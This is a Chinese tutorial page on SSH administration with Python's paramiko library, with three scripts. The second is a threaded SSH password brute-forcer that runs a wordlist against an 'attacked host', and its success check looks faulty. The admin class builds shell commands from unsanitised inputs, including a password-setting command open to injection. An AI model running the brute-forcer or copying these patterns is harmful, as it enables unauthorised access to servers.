Python使用Paramiko庫實現(xiàn)SSH管理詳解
paramiko 是一個用于在Python中實現(xiàn)SSHv2協(xié)議的庫,它支持對遠(yuǎn)程服務(wù)器進(jìn)行加密的通信。目前該模塊支持所有平臺架構(gòu)且自身遵循SSH2協(xié)議,支持以加密和認(rèn)證的方式,進(jìn)行遠(yuǎn)程服務(wù)器的連接,你可以在Python中實現(xiàn)SSH客戶端和服務(wù)器,并進(jìn)行安全的文件傳輸和遠(yuǎn)程命令執(zhí)行。
主要特點:
- SSH 支持:
paramiko
提供了對 SSHv2 協(xié)議的完整支持,可以用于安全地連接和通信到遠(yuǎn)程服務(wù)器。 - SSH 客戶端和服務(wù)端實現(xiàn):
paramiko
不僅可以用作 SSH 客戶端,還可以在 Python 中實現(xiàn) SSH 服務(wù)器。這意味著你可以使用paramiko
來創(chuàng)建自己的 SSH 服務(wù)器,或者編寫客戶端與遠(yuǎn)程服務(wù)器進(jìn)行通信。 - SFTP 文件傳輸:
paramiko
包含了對 SFTP(SSH 文件傳輸協(xié)議)的實現(xiàn),可以在安全通道上傳輸文件,支持上傳和下載文件。 - 支持密鑰認(rèn)證: 除了用戶名和密碼認(rèn)證外,
paramiko
還支持使用密鑰進(jìn)行認(rèn)證,包括支持 RSA 和 DSA 密鑰。 - 多種認(rèn)證方法: 支持多種認(rèn)證方法,包括密碼認(rèn)證、密鑰認(rèn)證、GSS-API 認(rèn)證等。
- 高級特性: 提供了一些高級特性,如端口轉(zhuǎn)發(fā)(port forwarding)、代理支持等,使其適用于更復(fù)雜的網(wǎng)絡(luò)場景。
- 跨平臺:
paramiko
可以在多個平臺上運(yùn)行,包括 Linux、Windows 和 macOS。 - 易用性: 提供了簡單而易用的 API,使得在 Python 中進(jìn)行 SSH 連接、文件傳輸?shù)炔僮髯兊萌菀住?/li>
- 活躍的社區(qū)支持:
paramiko
是一個開源項目,擁有活躍的社區(qū)支持。這意味著你可以在社區(qū)中找到文檔、示例代碼和得到技術(shù)支持。
實現(xiàn)簡單SSH連接
import paramiko,threading import argparse class MyThread(threading.Thread): def __init__(self,address,username,password,port,command): super(MyThread, self).__init__() self.address = address self.username = username self.password = password self.port = port self.command = command def run(self): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(self.address, port=self.port, username=self.username, password=self.password, timeout=1) stdin, stdout, stderr = ssh.exec_command(self.command) result = stdout.read() if not result: self.result = stderr.read() ssh.close() self.result = result.decode() except Exception: self.result = "0" def get_result(self): try: return self.result except Exception: return "0" if __name__ == "__main__": # 使用方式: main.py -a 192.168.1.1 -u root -p 123123 -c ifconfig parser = argparse.ArgumentParser() parser.add_argument("-a",dest="addr",help="指定一個IP地址") parser.add_argument("-u",dest="user",help="指定目標(biāo)主機(jī)用戶名") parser.add_argument("-p",dest="passwd",help="指定目標(biāo)主機(jī)密碼") parser.add_argument("-c",dest="command",help="指定需要執(zhí)行的命令") args = parser.parse_args() if args.addr and args.user and args.passwd and args.command: obj = MyThread(str(args.addr),str(args.user),str(args.passwd),"22",str(args.command)) obj.start() obj.join() ret = obj.get_result() if ret != "0": print(ret) else: parser.print_help()
實現(xiàn)SSH批量嘗試
import pexpect import os,sys,time import threading import argparse def SSHConnect(Host,User,Password,Port,Command): try: child = pexpect.spawn('ssh -l %s %s -p %s %s' %(User,Host,Port,Command),timeout=1) ret = child.expect([pexpect.TIMEOUT, 'Are you sure you want to continue connecting','[Pp]assword:',r"([^-]>|#)"]) if ret == 0: # 連接超時 child.close() return 0 elif ret == 1: # SSH提示你是否確認(rèn)連接 child.sendline ('yes') # 我們輸入yes child.expect ('password: ')# 輸入yes后應(yīng)該提示輸入密碼,我們再次期待 password ret = child.expect([pexpect.TIMEOUT, 'password: ']) if ret == 0: # 連接超時 child.close() return 0 ret = child.sendline(Password) if ret == 5: #child.expect(pexpect.EOF) #return child.before return 1 child.close() return 0 except Exception: child.close() return 0 def ThreadBlast(Host,User,Password,Port,semaphore): semaphore.acquire() # 加鎖 global number,PassCount RetCode = SSHConnect(Host,User,Password,Port,"pwd") if RetCode == 1: print("[*] 索引: {}/{} --> 密碼: {}".format(str(number),str(PassCount),Password)) else: print("[-] 索引: {}/{} --> 嘗試: {}".format(str(number),str(PassCount),Password)) number = number + 1 semaphore.release() # 釋放鎖 if __name__ == "__main__": # 使用方式: main.py -H 192.168.1.10 -u root -p 22 -f burp.log parser = argparse.ArgumentParser() parser.add_argument("-H","--host",dest="host",help="輸入一個被攻擊主機(jī)IP地址") parser.add_argument("-u","--user",dest="user",help="輸入主機(jī)的用戶賬號,root") parser.add_argument("-p","--port",dest="port",help="輸入SSH的端口號,22") parser.add_argument("-f","--file",dest="file",help="設(shè)置密碼字典 wordlist.log") args = parser.parse_args() if args.host and args.user and args.port and args.file: number = 0 semaphore = threading.Semaphore(4) fp = open(args.file,"r") PassList = fp.readlines() PassCount = len(PassList) for item in PassList: t = threading.Thread(target=ThreadBlast,args=(args.host,args.user,str(item.replace("\n","")),args.port,semaphore)) t.start() else: parser.print_help()
封裝MySSH通用類
import paramiko, math class MySSH: def __init__(self, address, username, password, default_port): self.address = address self.default_port = default_port self.username = username self.password = password # 初始化SSH接口 def Init(self): try: self.ssh_obj = paramiko.SSHClient() self.ssh_obj.set_missing_host_key_policy(paramiko.AutoAddPolicy()) self.ssh_obj.connect(self.address, self.default_port, self.username, self.password, timeout=3, allow_agent=False, look_for_keys=False) self.sftp_obj = self.ssh_obj.open_sftp() return True except Exception: return False return False # 執(zhí)行命令并返回執(zhí)行結(jié)果 def BatchCMD(self, command): try: stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3) result = stdout.read() if len(result) != 0: result = str(result).replace("\\n", "\n") result = result.replace("b'", "").replace("'", "") return result else: return None except Exception: return None # 執(zhí)行非交互命令 只返回執(zhí)行狀態(tài) ,或真或假 def BatchCMD_NotRef(self, command): try: stdin, stdout, stderr = self.ssh_obj.exec_command(command, timeout=3) result = stdout.read() if len(result) != 0: return True else: return None except Exception: return False # 將遠(yuǎn)程文件下載到本地 def GetRemoteFile(self, remote_path, local_path): try: self.sftp_obj.get(remote_path, local_path) return True except Exception: return False # 將本地文件上傳到遠(yuǎn)程 def PutLocalFile(self, localpath, remotepath): try: self.sftp_obj.put(localpath, remotepath) return True except Exception: return False # 獲取文件大小 def GetFileSize(self, file_path): ref = self.BatchCMD("du -s " + file_path + " | awk '{print $1}'") return ref.replace("\n", "") # 判斷文件是否存在 def IsFile(self, file_path): return self.BatchCMD("[ -e {} ] && echo 'True' || echo 'False'".format(file_path)) # 獲取系統(tǒng)型號 def GetSystemVersion(self): return self.BatchCMD("uname") # 關(guān)閉SSH接口 def CloseSSH(self): try: self.sftp_obj.close() self.ssh_obj.close() except Exception: pass # 測試主機(jī)連通率 def GetPing(self): try: if self.GetSystemVersion() != None: print("{} 已連通.".format(self.address)) return True else: return False except Exception: return False # 獲取文件列表,并得到大小 def GetFileList(self, path): try: ref_list = [] self.sftp_obj.chdir(path) file_list = self.sftp_obj.listdir("./") for sub_path in file_list: dict = {} file_size = self.GetFileSize(path + sub_path) dict[path + sub_path] = file_size ref_list.append(dict) return ref_list except Exception: return False # 將遠(yuǎn)程文件全部打包后拉取到本地 def GetTarPackageAll(self, path): try: file_list = self.sftp_obj.listdir(path) self.sftp_obj.chdir(path) for packageName in file_list: self.ssh_obj.exec_command("tar -czf /tmp/{0}.tar.gz {0}".format(packageName)) self.sftp_obj.get("/tmp/{}.tar.gz".format(packageName), "./file/{}.tar.gz".format(packageName)) self.sftp_obj.remove("/tmp/{}.tar.gz".format(packageName)) return True except Exception: return True # 獲取磁盤空間并返回字典 def GetAllDiskSpace(self): ref_dict = {} cmd_dict = {"Linux\n": "df | grep -v 'Filesystem' | awk '{print $5 \":\" $6}'", "AIX\n": "df | grep -v 'Filesystem' | awk '{print $4 \":\" $7}'" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): # 根據(jù)不同版本選擇不同的命令 os_ref = self.BatchCMD(run_cmd) ref_list = os_ref.split("\n") # 循環(huán)將其轉(zhuǎn)換為字典 for each in ref_list: # 判斷最后是否為空,過濾最后一項 if each != "": ref_dict[str(each.split(":")[1])] = str(each.split(":")[0]) return ref_dict except Exception: return False # 拉取內(nèi)存數(shù)據(jù)到本地。 def GetAllMemSpace(self): cmd_dict = {"Linux\n": "cat /proc/meminfo | head -n 2 | awk '{print $2}' | xargs | awk '{print $1 \":\" $2}'", "AIX\n": "svmon -G | grep -v 'virtual' | head -n 1 | awk '{print $2 \":\" $4}'" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) mem_total = math.ceil(int(os_ref.split(":")[0].replace("\n", "")) / 1024) mem_free = math.ceil(int(os_ref.split(":")[1].replace("\n", "")) / 1024) percentage = 100 - int(mem_free / int(mem_total / 100)) print("利用百分比: {} \t 總內(nèi)存: {} \t 剩余內(nèi)存: {}".format(percentage,mem_total,mem_free)) return str(percentage) + " %" except Exception: return False # 獲取CPU利用率數(shù)據(jù) def GetCPUPercentage(self): ref_dict = {} cmd_dict = {"Linux\n": "vmstat | tail -n 1 | awk '{print $13 \":\" $14 \":\" $15}'", "AIX\n": "vmstat | tail -n 1 | awk '{print $14 \":\" $15 \":\" $16}'" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ref_list = os_ref.split("\n") for each in ref_list: if each != "": each = each.split(":") ref_dict = {"us": each[0], "sys": each[1], "idea": each[2]} print("CPU利用率數(shù)據(jù): {}".format(ref_dict)) return ref_dict except Exception: return False # 獲取到系統(tǒng)負(fù)載利用率 也就是一分鐘負(fù)載五分鐘負(fù)載十五分鐘負(fù)載 def GetLoadAVG(self): ref_dict = {} cmd_dict = {"Linux\n": "cat /proc/loadavg | awk '{print $1 \":\" $2 \":\" $3}'", "AIX\n": "uptime | awk '{print $10 \":\" $11 \":\" $12}'" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ref_list = os_ref.split("\n") for each in ref_list: if each != "": each = each.replace(",","").split(":") ref_dict = {"1avg": each[0],"5avg": each[1],"15avg": each[2]} print("負(fù)載利用率: {}".format(ref_dict)) return ref_dict return False except Exception: return False # 獲取系統(tǒng)進(jìn)程信息,并返回字典格式 def GetAllProcessSpace(self): ref_dict = {} cmd_dict = {"Linux\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $11}' | uniq", "AIX\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $12}' | uniq" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ref_list = os_ref.split("\n") for each in ref_list: if each != "": ref_dict[str(each.split(":")[0])] = str(each.split(":")[1]) return ref_dict except Exception: return False # 檢測指定進(jìn)程是否存活 def CheckProcessStatus(self,processname): cmd_dict = {"Linux\n": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}"), "AIX\n": "ps aux | grep '{0}' | grep -v 'grep' | awk {1} | wc -l".format(processname,"{'print $2'}") } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ret_flag = str(os_ref.split("\n")[0].replace(" ","").strip()) if ret_flag != "0": return True return False except Exception: return "None" # 判斷指定進(jìn)程名是否存在,如果存在返回進(jìn)程 {PID:0,CPU:0,MEM:0} def CheckProcessName(self,ProcName): cmd_dict = {"Linux\n": "ps aux | grep '" + ProcName + "' | grep -v 'grep' | awk {'print $2 \":\" $3 \":\" $4'} | head -1", "AIX\n": "ps aux | grep -v 'USER' | awk '{print $2 \":\" $12}' | uniq" } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ref_list = os_ref.replace("\n","").split(":") ref_dict = {"PID": ref_list[0], "CPU": ref_list[1], "Mem": ref_list[2]} return ref_dict except Exception: return False return False # 檢測指定端口是否存活 def CheckPortStatus(self,port): cmd_dict = {"Linux\n": "netstat -antp | grep {0} | awk {1}".format(port,"{'print $6'}") , "AIX\n": "netstat -ant | grep {0} | head -n 1 | awk {1}".format(port,"{'print $6'}") } try: os_version = self.GetSystemVersion() for version, run_cmd in cmd_dict.items(): if (version == os_version): os_ref = self.BatchCMD(run_cmd) ret_flag = str(os_ref.split("\n")[0].replace(" ","").strip()) if ret_flag == "LISTEN" or ret_flag == "ESTABLISHED": return True return False except Exception: return False # 修改當(dāng)前用戶密碼 def SetPasswd(self,username,password): try: os_id = self.BatchCMD("id | awk {'print $1'}") print(os_id) if(os_id == "uid=0(root)\n"): self.BatchCMD("echo '{}' | passwd --stdin '{}' > /dev/null".format(password,username)) return True except Exception: return False if __name__ == "__main__": ssh = MySSH("132.35.69.71","root","123456789",22) if ssh.Init() == True: ref = ssh.GetAllDiskSpace() print(ref)
以上就是Python使用Paramiko庫實現(xiàn)SSH管理詳解的詳細(xì)內(nèi)容,更多關(guān)于Python Paramiko實現(xiàn)SSH管理的資料請關(guān)注腳本之家其它相關(guān)文章!
相關(guān)文章
淺談numpy.where() 的用法和np.argsort()的用法說明
這篇文章主要介紹了淺談numpy.where() 的用法和np.argsort()的用法說明,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧2021-05-05python實現(xiàn)解數(shù)獨(dú)程序代碼
最近在帶孩子學(xué)習(xí)數(shù)獨(dú),職業(yè)使然,就上網(wǎng)搜了下相關(guān)程序的解法,這里分享給大家,希望對大家學(xué)習(xí)python有所幫助2017-04-04Python內(nèi)建類型int源碼學(xué)習(xí)
這篇文章主要為大家介紹了Python內(nèi)建類型int源碼學(xué)習(xí),有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2022-05-05Python如何實現(xiàn)xml解析并輸出到Excel上
本文介紹了如何使用Python的ElementTree模塊解析XML文件,并將解析后的數(shù)據(jù)寫入Excel文件,通過編寫XML文件、解析XML、編寫將數(shù)據(jù)寫入Excel的函數(shù),最終實現(xiàn)XML數(shù)據(jù)到Excel的轉(zhuǎn)換2025-02-02Python爬蟲headers處理及網(wǎng)絡(luò)超時問題解決方案
這篇文章主要介紹了Python爬蟲headers處理及網(wǎng)絡(luò)超時問題解決方案,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友可以參考下2020-06-06Python lambda和Python def區(qū)別分析
Python支持一種有趣的語法,它允許你快速定義單行的最小函數(shù)。這些叫做lambda的函數(shù),是從Lisp借用來的,可以用在任何需要函數(shù)的地方2014-11-11python如何用matplotlib創(chuàng)建三維圖表
這篇文章主要介紹了python如何在matplotlib中創(chuàng)建三維圖表,幫助大家更好的利用python進(jìn)行數(shù)據(jù)分析,感興趣的朋友可以了解下2021-01-01python使用post提交數(shù)據(jù)到遠(yuǎn)程url的方法
這篇文章主要介紹了python使用post提交數(shù)據(jù)到遠(yuǎn)程url的方法,涉及Python使用post傳遞數(shù)據(jù)的相關(guān)技巧,需要的朋友可以參考下2015-04-04